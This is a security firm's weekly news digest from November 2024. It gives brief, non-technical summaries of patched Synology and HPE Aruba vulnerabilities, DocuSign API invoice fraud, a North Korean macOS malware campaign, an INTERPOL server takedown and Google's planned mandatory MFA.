Weekly Security News – 11th November 2024

22,000 malicious servers disrupted, Google making MFA mandatory and DocuSign's API abused...

Welcome to this week’s Security News. We’ve collated the best articles from the around the internet and put them all into one place. If you have any queries or concerns about anything in this week’s news, then please get in touch with our team who can advise further. For our existing clients, if we believe anything may affect your organisation, our team will be in touch directly. 

Vulnerabilities and Patches

Critical Zero-Click Vulnerability in Synology NAS Devices Needs Urgent Patching

Top network-attached storage (NAS) makers Synology has patched a critical severity vulnerability which could have allowed threat actors to remotely execute malicious code on affected endpoints. The vulnerability is tracked as CVE-2024-10443 and was found in DiskStation and BeePhotos. It was showcased during the recent Pwn2Own Ireland 2024 hackathon, where it was described as a zero-click flaw, and dubbed RISK:STATION.A zero-click flaw is a security vulnerability that can be exploited without any interaction from the victim, like clicking a link or opening an attachment. Attackers can use zero-click flaws to remotely compromise devices simply by sending a malicious message or file, making them particularly dangerous and difficult to detect. As the vulnerability can lead to device takeover, loss of data, and worse, the details have been withheld to give most of the users’ time to react, and to prevent hackers from easily exploiting it. Since the patch was already made available, users are advised to apply it immediately, or risk losing sensitive data to threat actors.

HPE Aruba Networking Releases Critical Security Updates for Instant AOS-8 and AOS-10 in Access Points

Hewlett Packard Enterprise (HPE) Aruba Networking has issued an advisory that addresses 5 vulnerabilities that affect Aruba Access Points (APs) product lines that use Instant AOS (ArubaOS) 8 and 10. AOS is a distributed network operating system working with Aruba Central that controls APs and optional gateways. Two critical command injection vulnerabilities and three high severity vulnerabilities could be exploited by an attacker to achieve remote code execution (RCE). Successful exploitation could lead to the ability to execute arbitrary code as a privileged user on the underlying operating system. Software versions that are End of Support Life (EoSL) are also affected by these vulnerabilities and are not addressed by this advisory. HPE Aruba Networking strongly recommends all customers running End of Support Life (EoSL) software to upgrade to a supported version as soon as possible. Affected organisations are encouraged to review the HPE Security Advisories and apply any relevant updates or workarounds.

Cyber Attacks

DocuSign Abused to Deliver Fake Invoices

Attackers are exploiting DocuSign’s API capabilities to deliver fake invoices that are bypassing traditional security measures. By leveraging legitimate DocuSign accounts and API access, threat actors are sending carefully crafted invoices directly to targets’ inboxes, with messages that look convincingly authentic. DocuSign, a widely used digital platform for managing secure electronic agreements, has inadvertently become a tool for scammers through its API environment. APIs, or Application Programming Interfaces, allow developers to integrate DocuSign’s services into other applications and automate document workflows. By gaining access to DocuSign’s API, attackers with legitimate accounts can create and send documents that appear to be genuine invoices or payment requests. Emails coming directly from DocuSign’s platform are marked as legitimate because they are technically coming from a trusted source, effectively bypassing these standard protections. Furthermore, the emails often impersonate well-known brands or suppliers, creating invoices that appear to come from established businesses.

North Korean Hackers Target macOS Users

North Korean cryptocurrency thieves are once again targeting macOS users with a new malware campaign that uses phishing emails, fake PDF applications, and a novel technique to evade Apple’s security measures. According to fresh research from SentinelOne, the notorious BlueNoroff hacking team was caught sending phishing lures with fake news headlines or stories about crypto-related topics to targets at decentralized finance (DeFi) and cryptocurrency businesses. Inside the emails, the North Korean government-backed hackers embedded a malicious macOS application disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”. SentinelOne said the campaign, called ‘Hidden Risk’, also abuses the ‘zshenv’ configuration file to maintain persistence without triggering macOS Ventura’s background item modification notifications. The macOS notifications are designed to alert users to changes in common persistence methods like LaunchAgents and LaunchDaemons.

In Other News...

INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime

INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation. Dubbed Operation Synergia II, the coordinated effort ran from April 1 to August 31, 2024, targeting phishing, ransomware, and information stealer infrastructure. “Of the approximately 30,000 suspicious IP addresses identified, 76 per cent were taken down and 59 servers were seized,” INTERPOL said. “Additionally, 43 electronic devices, including laptops, mobile phones and hard disks were seized”. INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation. Dubbed Operation Synergia II, the coordinated effort ran from April 1 to August 31, 2024, targeting phishing, ransomware, and information stealer infrastructure. “Of the approximately 30,000 suspicious IP addresses identified, 76 per cent were taken down and 59 servers were seized,” INTERPOL said. “Additionally, 43 electronic devices, including laptops, mobile phones and hard disks were seized”. The actions also led to the arrest of 41 individuals, with 65 others still under investigation.

MFA to be Mandatory on All Google Cloud Accounts by 2025

Google is making multi-factor authentication mandatory by the end of 2025 for all Google Cloud accounts. The tech giant said in a recent announcement that it will begin the transition with a phased rollout to help users adapt more smoothly. “This shift is backed by strong evidence both from our own experience and from U.S. government agencies,” Google said. “The Cybersecurity and Infrastructure Security Agency (CISA) found that MFA makes users 99% less likely to be hacked, a powerful reason to make the switch”. The mandatory MFA requirement for Google Cloud will be introduced in three stages to smooth out the process for users and enterprises. The rollout process is scheduled to take place over three stages, starting from this month and until the end of 2025: Phase 1- Encouragement and Awareness (Beginning November 2024), Phase 2 – Notifications to Enable MFA (Early 2025) and Phase 3 – Mandatory MFA Requirement (End of 2025). Google has developed a range of MFA options, including passkeys that leverage biometric data for a smoother and more secure experience.